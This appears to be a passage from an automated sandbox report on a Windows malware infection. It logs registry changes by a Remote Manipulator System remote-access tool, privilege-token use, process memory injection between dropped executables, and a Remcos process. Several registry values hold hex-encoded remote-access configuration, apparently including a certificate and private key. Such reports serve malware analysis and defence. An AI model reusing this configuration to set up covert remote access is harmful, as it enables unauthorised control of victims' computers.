a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a63774d544977496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a63774d544977496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\dllhost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\dllhost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A
N/A N/A C:\Program Files\Windows Media Player\graph\graph.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\client.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\random.exe
PID 3128 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 3128 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe C:\Users\Admin\AppData\Local\Temp\a\client.exe
PID 4860 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 4860 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\a\random.exe C:\Windows\system32\cmd.exe
PID 5008 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5008 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 5008 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 1504 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 5008 wrote to memory of 4244 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
